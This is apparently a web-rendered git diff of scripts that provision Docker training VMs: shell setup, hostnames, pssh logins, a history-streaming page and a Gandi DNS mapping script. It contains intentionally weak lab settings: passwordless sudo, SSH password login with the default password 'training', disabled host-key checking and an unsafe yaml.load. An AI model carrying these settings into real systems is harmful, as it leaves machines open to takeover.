paper_size = context["paper_size"]
|
||||
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
|
||||
with open("ips.html") as f:
|
||||
pdfkit.from_file(f, "ips.pdf", options={
|
||||
"page-size": SETTINGS["paper_size"],
|
||||
"margin-top": SETTINGS["paper_margin"],
|
||||
"margin-bottom": SETTINGS["paper_margin"],
|
||||
"margin-left": SETTINGS["paper_margin"],
|
||||
"margin-right": SETTINGS["paper_margin"],
|
||||
"page-size": paper_size,
|
||||
"margin-top": margin,
|
||||
"margin-bottom": margin,
|
||||
"margin-left": margin,
|
||||
"margin-right": margin,
|
||||
})
|
||||
print("Generated ips.pdf")
|
||||
except ImportError:
|
||||
|
||||
@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
|
||||
COMPOSE_VERSION = config["compose_version"]
|
||||
MACHINE_VERSION = config["machine_version"]
|
||||
CLUSTER_SIZE = config["clustersize"]
|
||||
CLUSTER_PREFIX = config["clusterprefix"]
|
||||
ENGINE_VERSION = config["engine_version"]
|
||||
DOCKER_USER_PASSWORD = config["docker_user_password"]
|
||||
|
||||
@@ -36,7 +37,7 @@ def system(cmd):
|
||||
td = str(t2-t1)[:5]
|
||||
f.write(bold("[{}] in {}s\n".format(retcode, td)))
|
||||
STEP += 1
|
||||
with open("/home/ubuntu/.bash_history", "a") as f:
|
||||
with open(os.environ["HOME"] + "/.bash_history", "a") as f:
|
||||
f.write("{}\n".format(cmd))
|
||||
if retcode != 0:
|
||||
msg = "The following command failed with exit code {}:\n".format(retcode)
|
||||
@@ -64,6 +65,15 @@ system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
|
||||
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
|
||||
SQRL""".format(ipv4))
|
||||
|
||||
# Bigger history, in a different file, and saved before executing each command
|
||||
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
|
||||
export HISTSIZE=9999
|
||||
export HISTFILESIZE=9999
|
||||
shopt -s histappend
|
||||
trap 'history -a' DEBUG
|
||||
export HISTFILE=~/.history
|
||||
SQRL""")
|
||||
|
||||
# Custom .vimrc
|
||||
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
|
||||
syntax on
|
||||
@@ -72,8 +82,29 @@ set expandtab
|
||||
set number
|
||||
set shiftwidth=2
|
||||
set softtabstop=2
|
||||
set nowrap
|
||||
SQRL""")
|
||||
|
||||
# Custom .tmux.conf
|
||||
system(
|
||||
"""sudo -u docker tee /home/docker/.tmux.conf <<SQRL
|
||||
bind h select-pane -L
|
||||
bind j select-pane -D
|
||||
bind k select-pane -U
|
||||
bind l select-pane -R
|
||||
|
||||
# Allow using mouse to switch panes
|
||||
set -g mouse on
|
||||
|
||||
# Make scrolling with wheels work
|
||||
|
||||
bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
|
||||
bind -n WheelDownPane select-pane -t= \; send-keys -M
|
||||
|
||||
SQRL"""
|
||||
)
|
||||
|
||||
|
||||
# add docker user to sudoers and allow password authentication
|
||||
system("""sudo tee /etc/sudoers.d/docker <<SQRL
|
||||
docker ALL=(ALL) NOPASSWD:ALL
|
||||
@@ -83,7 +114,8 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
|
||||
|
||||
system("sudo service ssh restart")
|
||||
system("sudo apt-get -q update")
|
||||
system("sudo apt-get -qy install git jq")
|
||||
system("sudo apt-get -qy install git jid jq")
|
||||
system("sudo apt-get -qy install emacs-nox joe")
|
||||
|
||||
#######################
|
||||
### DOCKER INSTALLS ###
|
||||
@@ -121,7 +153,7 @@ addresses = list(l.strip() for l in sys.stdin)
|
||||
assert ipv4 in addresses
|
||||
|
||||
def makenames(addrs):
|
||||
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
|
||||
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
|
||||
|
||||
while addresses:
|
||||
cluster = addresses[:CLUSTER_SIZE]
|
||||
@@ -135,15 +167,21 @@ while addresses:
|
||||
print(cluster)
|
||||
|
||||
mynode = cluster.index(ipv4) + 1
|
||||
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
|
||||
system("echo node{} | sudo tee /etc/hostname".format(mynode))
|
||||
system("sudo hostname node{}".format(mynode))
|
||||
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
|
||||
system("sudo -u docker mkdir -p /home/docker/.ssh")
|
||||
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
|
||||
|
||||
# Create a convenience file to easily check if we're the first node
|
||||
if ipv4 == cluster[0]:
|
||||
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
|
||||
# On the first node, if we don't have a private key, generate one (with empty passphrase)
|
||||
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
|
||||
else:
|
||||
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
|
||||
# Record the IPV4 and name of the first node
|
||||
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
|
||||
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
|
||||
|
||||
FINISH = time.time()
|
||||
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
|
||||
|
||||
@@ -18,7 +18,13 @@ pssh() {
|
||||
echo "[parallel-ssh] $@"
|
||||
export PSSH=$(which pssh || which parallel-ssh)
|
||||
|
||||
$PSSH -h $HOSTFILE -l ubuntu \
|
||||
case "$INFRACLASS" in
|
||||
hetzner) LOGIN=root ;;
|
||||
linode) LOGIN=root ;;
|
||||
*) LOGIN=ubuntu ;;
|
||||
esac
|
||||
|
||||
$PSSH -h $HOSTFILE -l $LOGIN \
|
||||
--par 100 \
|
||||
-O LogLevel=ERROR \
|
||||
-O UserKnownHostsFile=/dev/null \
|
||||
|
||||
42
prepare-vms/lib/tailhist.html
Normal file
42
prepare-vms/lib/tailhist.html
Normal file
@@ -0,0 +1,42 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>bash history</title>
|
||||
<style>
|
||||
#log {
|
||||
font: bold 24px courier;
|
||||
}
|
||||
|
||||
#log div:last-child {
|
||||
background: yellow;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div id="log"></div>
|
||||
|
||||
<script>
|
||||
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
|
||||
var log = document.getElementById('log');
|
||||
var echo = function(text) {
|
||||
var line = document.createElement('div');
|
||||
line.textContent = text;
|
||||
log.appendChild(line);
|
||||
line.scrollIntoView();
|
||||
}
|
||||
ws.onopen = function() {
|
||||
document.body.style.backgroundColor = '#cfc';
|
||||
};
|
||||
ws.onclose = function() {
|
||||
document.body.style.backgroundColor = '#fcc';
|
||||
echo("Disconnected from server. Try to reload this page?");
|
||||
};
|
||||
ws.onmessage = function(event) {
|
||||
echo(event.data);
|
||||
};
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
71
prepare-vms/map-dns.py
Executable file
71
prepare-vms/map-dns.py
Executable file
@@ -0,0 +1,71 @@
|
||||
#!/usr/bin/env python
|
||||
"""
|
||||
There are two ways to use this script:
|
||||
|
||||
1. Pass a file name and a tag name as a single argument.
|
||||
It will load a list of domains from the given file (one per line),
|
||||
and assign them to the clusters corresponding to that tag.
|
||||
There should be more domains than clusters.
|
||||
Example: ./map-dns.py domains.txt 2020-08-15-jp
|
||||
|
||||
2. Pass a domain as the 1st argument, and IP addresses then.
|
||||
It will configure the domain with the listed IP addresses.
|
||||
Example: ./map-dns.py open-duck.site 1.2.3.4 2.3.4.5 3.4.5.6
|
||||
|
||||
In both cases, the domains should be configured to use GANDI LiveDNS.
|
||||
"""
|
||||
import os
|
||||
import requests
|
||||
import sys
|
||||
import yaml
|
||||
|
||||
# This can be tweaked if necessary.
|
||||
config_file = os.path.join(
|
||||
os.environ["HOME"], ".config/gandi/config.yaml")
|
||||
apiurl = "https://dns.api.gandi.net/api/v5/domains"
|
||||
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]
|
||||
|
||||
# Figure out if we're called for a bunch of domains, or just one.
|
||||
domain_or_domain_file = sys.argv[1]
|
||||
if os.path.isfile(domain_or_domain_file):
|
||||
domains = open(domain_or_domain_file).read().split()
|
||||
domains = [ d for d in domains if not d.startswith('#') ]
|
||||
tag = sys.argv[2]
|
||||
ips = open(f"tags/{tag}/ips.txt").read().split()
|
||||
settings_file = f"tags/{tag}/settings.yaml"
|
||||
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
|
||||
else:
|
||||
domains = [domain_or_domain_file]
|
||||
ips = sys.argv[2:]
|
||||
clustersize = len(ips)
|
||||
|
||||
# Now, do the work.
|
||||
while domains and ips:
|
||||
domain = domains[0]
|
||||
domains = domains[1:]
|
||||
cluster = ips[:clustersize]
|
||||
ips = ips[clustersize:]
|
||||
print(f"{domain} => {cluster}")
|
||||
zone = ""
|
||||
node = 0
|
||||
for ip in cluster:
|
||||
node += 1
|
||||
zone += f"@ 300 IN A {ip}\n"
|
||||
zone += f"* 300 IN A {ip}\n"
|
||||
zone += f"node{node} 300 IN A {ip}\n"
|
||||
r = requests.put(
|
||||
f"{apiurl}/{domain}/records",
|
||||
headers={"x-api-key": apikey},
|
||||
data=zone)
|
||||
print(r.text)
|
||||
|
||||
#r = requests.get(
|
||||
# f"{apiurl}/{domain}/records",
|
||||
# headers={"x-api-key": apikey},
|
||||
# )
|
||||
|
||||
if domains:
|
||||
print(f"Good, we have {len(domains)} domains left.")
|
||||
|
||||
if ips:
|
||||
print(f"Crap, we have {len(ips)} IP addresses left.")
|
||||
@@ -1,26 +1,23 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
cards_template: cards.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
compose_version: 1.24.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
image:
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user